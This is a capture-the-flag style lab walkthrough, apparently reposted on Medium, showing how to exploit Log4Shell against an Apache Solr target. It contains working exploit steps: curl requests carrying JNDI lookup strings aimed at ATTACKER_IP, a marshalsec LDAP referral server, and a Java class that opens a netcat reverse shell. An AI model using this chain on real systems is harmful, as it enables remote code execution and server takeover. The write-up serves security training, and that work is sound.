The exploitation of a vulnerability named Log4Shell (CVE-2021–44228)

Intro

This lab covers the exploitation of a vulnerability in Log4j.

Apache Solr 8.11.0 is running on the target machine which this version of the software is prone to vulnerable log4j package (CVE-2021–44228). The application itself runs on Java 1.8.0_181.

Enum

We can see clear indicators of log4j used for logging activity when we browse Solr Admin Dashboard:

In order to find the injection point, we can review the log files of the “Solr”. The “solr.log” has a significant number of INFO entries showing repeated requests to one specific URL endpoint (/solr/admin/cores).

The “params” field name indicates some data entry point that we can use as an injection point. Here we can see from the inspected traffic with proxy.

PoC

The log4j package adds extra logic to logs by “parsing” entries, ultimately to enrich the data — but may additionally take actions and even evaluate code based on the entry data. This is the gist of CVE-2021-44228.

To exploit this issue, we need to have a malicious LDAP server.

The “Marshalsec” can be used for this part:

We need a public IP address and two ports: one for the LDAP server and one for the HTTP Server that will host the malicious class.

Let’s check if we can confirm whether the target is vulnerable or not.

curl 'http://vulnsolr.loc:8983/solr/admin/cores?_=$\{jndi:ldap://ATTACKER_IP:LPORT\}'

Output:

From the output, we can see that the netcat listener was able to catch inbound traffic from the vulnerable machine.

Well, run the below command to build the “marshalsec” utility:

mvn clean package -DskipTests

With the marshalsec utility, we can start an LDAP referral server to direct connections to our secondary HTTP server:

sudo java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ATTACKER_IP:8000/#Log4jshell

Now, time to create a malicious class containing a reverse shell with Java.

“Log4jshell.java”:

public class Log4jshell { static { try { java.lang.Runtime.getRuntime().exec("nc -e /bin/bash ATTACKER_IP LPORT"); } catch (Exception e) { e.printStackTrace(); } } }

Compile malicious payload:

javac Log4jshell.java

Output:

With python, we can run HTTP Server that hosts the malicious class.

python3 -m http.server 8000

Finally, we can request a malicious class in order to trigger the reverse shell and execute commands.

curl 'http://vulnsolr.loc:8983/solr/admin/cores?_=$\{jndi:ldap://ATTACKER_IP:LDAP_PORT/Log4jshell\}'

Output:

Disclaimer
All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.

For further practice you can follow the THM room:
https://tryhackme.com/room/solar

Published

Originally published at https://www.hackersnotes.com on December 14, 2021.

--

--

--

Cyber-security Enthusiast

Love podcasts or audiobooks? Learn on the go with our new app.

Nibbles HTB Walkthrough

Hack The Box Write-Up : Mirai Without Metasploit

{UPDATE} Super Octagon free Hack Free Resources Generator

When Shakespeare ponders the PCI DSS requirement to be onsite

Bitcoin Security Made Easy: simple tips for non-experts

XT Will List NFUP

AES Encryption Keys (password hashing)

{UPDATE} Doodle Puzzles Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
@kryptohaker

@kryptohaker

Cyber-security Enthusiast

More from Medium

Browser Engines: The Crux Of Cross Browser Compatibility

#6 NETWORK MEDIA TYPES: THE NETWORKING SERIES

How to Migrate DHCP Service from Cisco Core Switch to Server 2022 — ICT Fella

Log4J Zero-Day Vulnerability, Amazon Web Services, Microsoft Azure — SpinSci

Log4J Zero-Day Vulnerability — SpinSci